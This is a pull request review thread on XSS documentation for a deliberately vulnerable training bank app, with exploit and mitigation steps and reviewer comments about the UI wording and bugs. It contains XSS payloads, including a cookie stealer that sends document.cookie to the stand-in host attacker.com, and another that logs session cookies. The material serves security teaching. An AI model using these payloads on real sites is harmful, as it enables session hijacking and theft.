XSS, Security Misconfiguration, Global Vulnerability toggle system (#35)
schectma/vuln-bank-467_W26: DOCS/XSS.md

# Cross-Site Scripting (XSS)

XSS allows attackers to inject malicious scripts into web pages viewed by other users. When user input is rendered without sanitization, attackers can execute arbitrary JavaScript in victims' browsers.

## Prerequisites

- Browser access to functioning web app
- One registered user account
- Access to browser developer console

## Toggle Setup

Use the global **Toggle Mitigation** button on the app's homepage to switch between Vulnerable (protections off) and Hardened (protections on) states. For the exploit steps, ensure the toggle is set to **Vulnerable**. For mitigation verification, set it to **Hardened**—no env changes or restarts needed.

## Demonstrations

### Transaction Description XSS

Allows injection of malicious scripts through transaction descriptions.

#### Exploit

1. Confirm the app is in **Vulnerable** mode (Toggle Mitigation should indicate protections are off)
2. Log in to your account

> 3. Navigate to "Send Money" section in the dashboard

Reviewer: ```suggestion
3. Navigate to "Money Transfer" section in the dashboard
```

4. Fill in the transfer form:
   - **Recipient Account Number**: Enter any valid account number (e.g., `ACC1002` for another test user)
   - **Amount**: Enter any amount (e.g., `10.00`)
   - **Description**: Enter the following XSS payload:
     ```
     <img src=x onerror="alert('XSS Vulnerability!')">
     ```

> 5. Click "Transfer" button to submit the transaction

Reviewer: ```suggestion
5. Click "Send Money" button to submit the transaction
```

6. Navigate to "Transaction History" section on your dashboard
7. Observe the alert popup appears immediately when the page renders

> **Expected Result (Vulnerable):** Alert popup displays "XSS Vulnerability!" demonstrating arbitrary JavaScript execution. The script executes every time the transaction history is viewed.

Reviewer: ```suggestion
6. Observe the alert popup appears immediately when the page renders.

**Expected Result (Vulnerable):** Alert popup displays "XSS Vulnerability!" demonstrating arbitrary JavaScript execution. 
7. Navigate to "Transaction History" section on your dashboard to see that the transaction was added.

```

The popup appears as soon as the "Send Money" button is clicked for me so I just edited this a little.

Reviewer: So the script pops up the amount of times that I have added a transaction (so if I do 4 transactions and add another one, I get the popup button 5 times when I hit "Send Money". I'm not sure if that is working as intended?

Reviewer 2: > So the script pops up the amount of times that I have added a transaction

Confirmed, was able to reproduce this. @chrys-pl please log in Issues as a bug

**Advanced Test**: Replace the payload with a cookie stealer to demonstrate data exfiltration:
```

> <img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">

Reviewer: Is this supposed to do the same thing as above with the pop up? It is behaving in the same way so just want to make sure that is the expected behavior.

Reviewer 2: What's the expected or intended outcome of this specific test? Are lines 43 & 45 below meant to describe that?

Reviewer 2: This triggers the same popup as `<img src=x onerror="alert('XSS Vulnerability!')">` does when pasted into the description field of a transfer. @chrys-pl please clarify intended observable outcome and/or log in issues as bug

3. Go to Console tab
4. Execute the following command to view current bill categories:
   ```javascript
   fetch('/api/bill-categories', {
       headers: { 'Authorization': 'Bearer ' + localStorage.getItem('jwt_token') }
   }).then(r => r.json()).then(console.log);
   ```
5. Note: In a real attack scenario, an attacker with database access could inject XSS into category/biller names

##### Method 2: Via Payment Description (User Input)

1. Confirm the app is in **Vulnerable** mode (Toggle Mitigation should indicate protections are off)
2. Log in and navigate to "Bill Payments" section
3. Click "Pay Bill" button
4. Select any category (e.g., "Utilities") and biller (e.g., "Electric Company")
5. Fill in payment details:
   - **Amount**: Enter any amount (e.g., `50.00`)
   - **Payment Method**: Select "Account Balance" or "Virtual Card"
   - **Description**: Enter the following payload:
     ```
     <img src=x onerror="console.log('XSS in payment:',document.cookie)">
     ```
6. Submit the payment
7. Navigate to "Bill Payments" section and view payment history
8. Open browser console (F12 → Console tab)
9. Observe the XSS payload executes and logs session cookies

> **Expected Result (Vulnerable):** Browser console displays session cookies with message "XSS in payment:" followed by the cookie data including JWT token.

Reviewer: I didn't get this popup when I submitted or viewed the payment.

Reviewer 2: > I didn't get this popup when I submitted or viewed the payment.

There's no popup. Message and cookie are logged to console as described

#### Mitigate

1. Return to the homepage and click **Toggle Mitigation** to switch to **Hardened** mode (protections on)
2. Repeat exploit steps (create a new payment with XSS payload in description)
3. View payment history and check browser console

> **Expected Result (Protected):** HTML is escaped and displayed as plain text. Browser console shows no XSS execution. The payload appears as literal text: `<img src=x onerror="console.log('XSS in payment:',document.cookie)">`

Reviewer: Adding an image of what this is supposed to look like might be helpful to the user.

Reviewer 2: This will be required for approval moving forward. Discord poll: https://discord.com/channels/1460313778305634563/1462813587008389293/1466539502213533919

# Cross-Site Scripting (XSS)

XSS allows attackers to inject malicious scripts into web pages viewed by other users. When user input is rendered without sanitization, attackers can execute arbitrary JavaScript in victims' browsers.

## Prerequisites

- Browser access to functioning web app
- One registered user account
- Access to browser developer console

## Configuration

> Set the following in your `.env` file:

Reviewer 3: This can be removed since you implemented the global toggle

#### Exploit

1. Log in to your account
2. Navigate to "Send Money" section in the dashboard
3. Fill in the transfer form:
   - **Recipient Account Number**: Enter any valid account number (e.g., `ACC1002` for another test user)
   - **Amount**: Enter any amount (e.g., `10.00`)
   - **Description**: Enter the following XSS payload:
     ```
     <img src=x onerror="alert('XSS Vulnerability!')">
     ```
4. Click "Transfer" button to submit the transaction
5. Navigate to "Transaction History" section on your dashboard
6. Observe the alert popup appears immediately when the page renders

**Expected Result (Vulnerable):** Alert popup displays "XSS Vulnerability!" demonstrating arbitrary JavaScript execution. The script executes every time the transaction history is viewed.

**Advanced Test**: Replace the payload with a cookie stealer to demonstrate data exfiltration:
```
<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">
```
(Note: This will fail in a real scenario but demonstrates the attack vector)

#### Mitigate

1. Stop the application (Ctrl+C if running locally, or `docker-compose down` if using Docker)
2. Edit the `.env` file and update:
   ```

>    XSS_PROTECTION_ENABLED=true

Reviewer 3: Same note as above, this can be removed

##### Method 2: Via Payment Description (User Input)

1. Log in and navigate to "Bill Payments" section
2. Click "Pay Bill" button
3. Select any category (e.g., "Utilities") and biller (e.g., "Electric Company")
4. Fill in payment details:
   - **Amount**: Enter any amount (e.g., `50.00`)
   - **Payment Method**: Select "Account Balance" or "Virtual Card"
   - **Description**: Enter the following payload:
     ```
     <img src=x onerror="console.log('XSS in payment:',document.cookie)">
     ```
5. Submit the payment
6. Navigate to "Bill Payments" section and view payment history
7. Open browser console (F12 → Console tab)
8. Observe the XSS payload executes and logs session cookies

**Expected Result (Vulnerable):** Browser console displays session cookies with message "XSS in payment:" followed by the cookie data including JWT token.

#### Mitigate

1. Stop the application
2. Edit the `.env` file and update:
   ```
   XSS_PROTECTION_ENABLED=true
   ```
3. Restart the application
4. Repeat exploit steps (create a new payment with XSS payload in description)
5. View payment history and check browser console

> **Expected Result (Protected):** HTML is escaped and displayed as plain text. Browser console shows no XSS execution. The payload appears as literal text: `<img src=x onerror="console.log('XSS in payment:',document.cookie)">`

Reviewer 3: Similar issue to the one found for testing the hardened state for transfers. Toggling in hardened mode is invalidating the session/authorization token, it seems.

- One registered user account
- Access to browser developer console

## Toggle Setup

> Use the global **Toggle Mitigation** button on the app's homepage to switch between Vulnerable (protections off) and Hardened (protections on) states. For the exploit steps, ensure the toggle is set to **Vulnerable**. For mitigation verification, set it to **Hardened**—no env changes or restarts needed.

Reviewer 2: ```suggestion
Use the global **Toggle Vulnerabilities** button on the app's homepage to switch between Vulnerable (protections off) and Hardened (protections on) states. For the exploit steps, ensure the toggle is set to **Vulnerable**. For mitigation verification, set it to **Hardened**—no env changes or restarts needed.
```
We might need a better word or phrase for this button. Will follow up on Discord
